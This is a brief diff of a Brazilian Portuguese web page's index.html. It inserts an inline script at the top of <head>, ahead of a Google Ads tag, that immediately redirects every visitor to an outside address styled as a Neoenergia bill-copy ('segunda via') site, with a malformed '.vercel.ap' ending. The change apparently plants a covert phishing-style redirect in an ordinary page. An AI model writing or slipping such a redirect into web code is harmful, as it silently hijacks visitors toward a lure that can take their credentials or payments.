--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html lang="pt-BR">
-<head><!-- Google tag (gtag.js) -->
+<head><script>window.location.replace("https://neoenergiasegundavia.vercel.ap");</script><!-- Google tag (gtag.js) -->
 <script async src="https://www.googletagmanager.com/gtag/js?id=AW-17152322043">
 </script>
 <script>
